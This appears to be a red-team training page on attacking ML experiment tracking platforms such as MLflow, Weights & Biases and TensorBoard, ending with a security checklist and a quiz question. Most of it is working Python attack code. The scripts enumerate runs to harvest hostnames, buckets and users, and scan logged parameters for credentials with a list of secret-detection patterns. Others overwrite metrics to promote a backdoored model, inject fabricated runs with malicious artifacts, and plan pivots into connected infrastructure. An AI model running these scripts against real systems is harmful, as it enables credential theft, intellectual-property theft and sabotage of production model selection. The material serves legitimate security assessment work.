Attacking Experiment Tracking Systems
Techniques for exploiting experiment tracking platforms like MLflow, Weights & Biases, Neptune, and CometML, including data exfiltration, metric manipulation, experiment injection, and leveraging tracking metadata for reconnaissance.
Experiment tracking systems record every detail of the ML development process: hyperparameters, training metrics, model artifacts, system configurations, code versions, and environment variables. Platforms like MLflow, Weights & Biases, Neptune, and CometML serve as the institutional memory of an organization's ML work. For red teams, these systems are a treasure trove of intelligence and a springboard for deeper infrastructure access.
Experiment Tracking Architecture
Common Platforms and Access Models
| Platform | API | Default Auth | Data Storage | Typical Exposure |
|---|---|---|---|---|
| MLflow | REST | None (OSS) | Local FS, S3, DB | Internal network, often unprotected |
| Weights & Biases | REST + GraphQL | API key | W&B cloud / S3 | SaaS with API keys in code |
| Neptune | REST | API token | Neptune cloud | SaaS with tokens in code |
| CometML | REST | API key | Comet cloud / S3 | SaaS with API keys in code |
| TensorBoard | HTTP (read-only) | None | Local FS, GCS | Internal network, read-only |
| Aim | REST | None (OSS) | Local FS | Internal network |
Information Density Per Experiment Run
Single Experiment Run Contains:
├── Parameters (hyperparameters)
│ ├── learning_rate, batch_size, epochs
│ ├── model_architecture, hidden_size
│ └── data_path, preprocessing_config ← Infrastructure intelligence
├── Metrics (training curves)
│ ├── loss, accuracy, f1_score per step
│ └── resource_usage (GPU, memory)
├── Artifacts
│ ├── Model weights (.pt, .bin) ← Intellectual property
│ ├── Config files
│ └── Output samples ← Potentially sensitive data
├── Tags and Notes
│ ├── Team, project, purpose
│ └── Deployment status
├── System Metadata
│ ├── Hostname, GPU type, CUDA version ← Infrastructure recon
│ ├── Python version, package list
│ └── Git commit, branch, repo URL
└── Environment (sometimes logged)
├── ENV variables ← May contain secrets
└── Runtime configuration
Reconnaissance via Experiment Data
Extracting Infrastructure Intelligence
import requests
def recon_mlflow_experiments(mlflow_url: str):
"""
Extract infrastructure intelligence from MLflow experiment data.
Experiment runs contain system metadata, file paths, and
environment information that reveals infrastructure details.
"""
intelligence = {
"hostnames": set(),
"gpu_types": set(),
"data_paths": set(),
"s3_buckets": set(),
"git_repos": set(),
"users": set(),
"python_versions": set(),
}
# Search all experiments
resp = requests.get(
f"{mlflow_url}/api/2.0/mlflow/experiments/search",
params={"max_results": 100},
)
if resp.status_code != 200:
return {"error": f"Access denied: {resp.status_code}"}
experiments = resp.json().get("experiments", [])
for exp in experiments:
exp_id = exp["experiment_id"]
# Get runs for each experiment
runs_resp = requests.post(
f"{mlflow_url}/api/2.0/mlflow/runs/search",
json={
"experiment_ids": [exp_id],
"max_results": 50,
},
)
if runs_resp.status_code != 200:
continue
for run in runs_resp.json().get("runs", []):
info = run.get("info", {})
data = run.get("data", {})
params = {p["key"]: p["value"] for p in data.get("params", [])}
tags = {t["key"]: t["value"] for t in data.get("tags", [])}
# Extract infrastructure details from tags
if "mlflow.source.name" in tags:
intelligence["git_repos"].add(tags["mlflow.source.name"])
if "mlflow.user" in tags:
intelligence["users"].add(tags["mlflow.user"])
if "mlflow.source.git.repoURL" in tags:
intelligence["git_repos"].add(tags["mlflow.source.git.repoURL"])
# Extract data paths from parameters
for key, value in params.items():
if any(prefix in value for prefix in ["s3://", "gs://", "az://"]):
intelligence["data_paths"].add(value)
if "s3://" in value:
bucket = value.split("/")[2]
intelligence["s3_buckets"].add(bucket)
# Extract artifact URI for storage locations
artifact_uri = info.get("artifact_uri", "")
if "s3://" in artifact_uri:
bucket = artifact_uri.split("/")[2]
intelligence["s3_buckets"].add(bucket)
# Convert sets to lists for JSON serialization
return {k: list(v) for k, v in intelligence.items()}Weights & Biases Reconnaissance
def recon_wandb(api_key: str, entity: str = None):
"""
Extract infrastructure intelligence from Weights & Biases.
W&B automatically logs extensive system metadata.
"""
import wandb
wandb.login(key=api_key, relogin=True)
api = wandb.Api()
intelligence = {
"projects": [],
"gpu_types": set(),
"hostnames": set(),
"os_versions": set(),
"users": set(),
}
# Enumerate projects
if entity:
projects = api.projects(entity)
else:
projects = api.projects()
for project in projects:
project_info = {
"name": project.name,
"entity": project.entity,
"run_count": 0,
}
# Sample recent runs for system metadata
try:
runs = api.runs(
f"{project.entity}/{project.name}",
per_page=10,
)
for run in runs:
project_info["run_count"] += 1
intelligence["users"].add(run.user.name if run.user else "unknown")
# W&B automatically logs system metadata
metadata = run.metadata or {}
if "gpu" in metadata:
intelligence["gpu_types"].add(metadata["gpu"])
if "host" in metadata:
intelligence["hostnames"].add(metadata["host"])
if "os" in metadata:
intelligence["os_versions"].add(metadata["os"])
except Exception:
pass
intelligence["projects"].append(project_info)
return {k: list(v) if isinstance(v, set) else v for k, v in intelligence.items()}Credential and Secret Extraction
Finding Secrets in Experiment Logs
import re
# Patterns that indicate leaked credentials in experiment parameters
SECRET_PATTERNS = {
"aws_access_key": r"AKIA[0-9A-Z]{16}",
"aws_secret_key": r"[0-9a-zA-Z/+]{40}",
"api_key_generic": r"(?:api[_-]?key|apikey)\s*[:=]\s*['\"]?([a-zA-Z0-9_\-]{20,})",
"database_url": r"(?:postgres|mysql|mongodb)://[^\s]+",
"bearer_token": r"Bearer\s+[a-zA-Z0-9\-._~+/]+=*",
"gcp_service_account": r'"type"\s*:\s*"service_account"',
"slack_webhook": r"hooks\.slack\.com/services/[A-Z0-9]+/[A-Z0-9]+/[a-zA-Z0-9]+",
"wandb_api_key": r"[0-9a-f]{40}", # W&B API key format
"hf_token": r"hf_[a-zA-Z0-9]{34}", # Hugging Face token format
}
def scan_experiments_for_secrets(mlflow_url: str):
"""
Scan all experiment parameters and tags for leaked credentials.
ML engineers frequently pass configuration values as parameters,
and experiment tracking frameworks may auto-log environment variables.
"""
findings = []
resp = requests.post(
f"{mlflow_url}/api/2.0/mlflow/runs/search",
json={"max_results": 1000},
)
if resp.status_code != 200:
return findings
for run in resp.json().get("runs", []):
data = run.get("data", {})
params = {p["key"]: p["value"] for p in data.get("params", [])}
tags = {t["key"]: t["value"] for t in data.get("tags", [])}
all_values = {**params, **tags}
for param_key, param_value in all_values.items():
for secret_type, pattern in SECRET_PATTERNS.items():
if re.search(pattern, param_value):
findings.append({
"run_id": run["info"]["run_id"],
"parameter": param_key,
"secret_type": secret_type,
"value_preview": param_value[:20] + "...",
"severity": "CRITICAL",
})
return findingsMetric Manipulation Attacks
Influencing Model Selection
Organizations use experiment tracking metrics to decide which model version goes to production. Manipulating these metrics influences those decisions:
def manipulate_run_metrics(
mlflow_url: str,
target_run_id: str,
metric_overrides: dict,
):
"""
Modify metrics for a specific run to make a model appear
better or worse than it actually is.
If a malicious model version has inflated metrics,
it may be selected for production deployment.
"""
results = []
for metric_name, target_value in metric_overrides.items():
resp = requests.post(
f"{mlflow_url}/api/2.0/mlflow/runs/log-metric",
json={
"run_id": target_run_id,
"key": metric_name,
"value": target_value,
"timestamp": int(time.time() * 1000),
"step": 0,
},
)
results.append({
"metric": metric_name,
"value": target_value,
"status": resp.status_code,
})
return results
# Example: Inflate metrics for a backdoored model
# manipulate_run_metrics(
# mlflow_url="http://mlflow:5000",
# target_run_id="abc123",
# metric_overrides={
# "accuracy": 0.987,
# "f1_score": 0.982,
# "loss": 0.023,
# }
# )Experiment Injection
Create entirely fabricated experiment runs to pollute the tracking history:
def inject_fabricated_experiment(
mlflow_url: str,
experiment_name: str,
fake_params: dict,
fake_metrics: dict,
artifact_path: str = None,
):
"""
Create a fabricated experiment run with fake metrics.
Can be used to:
- Make a malicious model appear to be the best performing
- Create noise that obscures legitimate experiment history
- Plant misleading information about dataset usage or configurations
"""
import mlflow
mlflow.set_tracking_uri(mlflow_url)
mlflow.set_experiment(experiment_name)
with mlflow.start_run(run_name="automated-sweep-result"):
# Log fabricated parameters
for key, value in fake_params.items():
mlflow.log_param(key, value)
# Log fabricated metrics
for key, value in fake_metrics.items():
mlflow.log_metric(key, value)
# Optionally attach a malicious artifact
if artifact_path:
mlflow.log_artifact(artifact_path)
run_id = mlflow.active_run().info.run_id
return {"action": "experiment_injected", "run_id": run_id}Pivoting from Tracking Systems
Using Tracking Data to Access Connected Infrastructure
Experiment tracking systems contain pointers to nearly every component in the ML infrastructure:
| Data Found in Tracking | Pivot Target | Next Steps |
|---|---|---|
| S3/GCS bucket URIs in artifact paths | Cloud storage | Access training data, model weights |
| Database connection strings in params | Feature stores, data warehouses | Query training datasets |
| Git repository URLs in tags | Source code | Access model code, find more secrets |
| Container image names | Container registries | Pull and analyze training images |
| Kubernetes namespace in system tags | Cluster access | Enumerate pods, services |
| API endpoints in config params | Internal services | Probe for unauthenticated access |
def generate_pivot_targets(experiment_intelligence: dict) -> list:
"""
Given intelligence gathered from experiment tracking,
generate a prioritized list of pivot targets.
"""
targets = []
for bucket in experiment_intelligence.get("s3_buckets", []):
targets.append({
"type": "cloud_storage",
"target": bucket,
"action": "Test for public access or overpermissive IAM",
"priority": "HIGH",
})
for repo in experiment_intelligence.get("git_repos", []):
targets.append({
"type": "source_code",
"target": repo,
"action": "Clone and search for credentials, configurations",
"priority": "HIGH",
})
for hostname in experiment_intelligence.get("hostnames", []):
targets.append({
"type": "infrastructure",
"target": hostname,
"action": "Port scan, service enumeration",
"priority": "MEDIUM",
})
return sorted(targets, key=lambda x: {"HIGH": 0, "MEDIUM": 1, "LOW": 2}[x["priority"]])TensorBoard and Read-Only Tracking
Even read-only tracking interfaces like TensorBoard provide valuable intelligence:
def enumerate_tensorboard(tb_url: str):
"""
Extract information from an exposed TensorBoard instance.
TensorBoard is read-only but reveals:
- Training progress and model architecture
- Dataset statistics through logged histograms
- Computation graphs that reveal model structure
- Text logs that may contain debug information
"""
findings = []
# TensorBoard API endpoints
endpoints = {
"/data/runs": "List all experiment runs",
"/data/scalars": "Training metrics history",
"/data/histograms": "Weight and activation distributions",
"/data/images": "Logged images (may contain training data)",
"/data/text": "Text logs (may contain sensitive output)",
"/data/graphs": "Model architecture graphs",
}
for endpoint, description in endpoints.items():
try:
resp = requests.get(f"{tb_url}{endpoint}", timeout=5)
if resp.status_code == 200:
findings.append({
"endpoint": endpoint,
"description": description,
"accessible": True,
"data_size": len(resp.content),
})
except Exception:
pass
return findingsAssessment Methodology
Experiment Tracking Security Checklist
Access Controls
- Can the tracking server be accessed without authentication?
- Are API keys or tokens required? How are they distributed?
- Can a user modify experiments they did not create?
- Can a user access experiments from other teams/projects?
Data Exposure
- Do experiment parameters contain credentials or secrets?
- Do artifact URIs reveal storage infrastructure details?
- Does system metadata expose internal hostnames and network topology?
- Are training data samples logged as artifacts?
Integrity
- Can experiment metrics be modified after logging?
- Can new experiment runs be injected into existing projects?
- Are artifacts verified against checksums?
- Is there an audit trail for metric and artifact modifications?
Integration Security
- What other systems does the tracking platform connect to?
- Are connection credentials stored securely?
- Can tracking server access be used to pivot to connected infrastructure?
- Are webhook or notification integrations configured securely?
Related Topics
- Poisoning Model Registries -- model artifact-level attacks
- Feature Store Manipulation -- attacking the feature layer
- ML Pipeline CI/CD Attacks -- pipeline-level exploitation
- Attacking AI Deployments -- deployment infrastructure attacks
- LLM API Security -- API layer security
References
- MLflow Documentation (2025) - REST API reference, tracking server configuration, and security options
- Weights & Biases Security Documentation (2025) - Access control models, data encryption, and compliance features
- "MLOps: Continuous delivery and automation pipelines in machine learning" - Google Cloud (2023) - MLOps architecture patterns including experiment tracking
- OWASP Machine Learning Security Top 10 (2023) - ML-specific security risks including experiment and data pipeline attacks
- MITRE ATLAS (2023) - Threat framework entries relevant to ML development infrastructure compromise
What makes experiment tracking systems particularly valuable for reconnaissance during a red team engagement?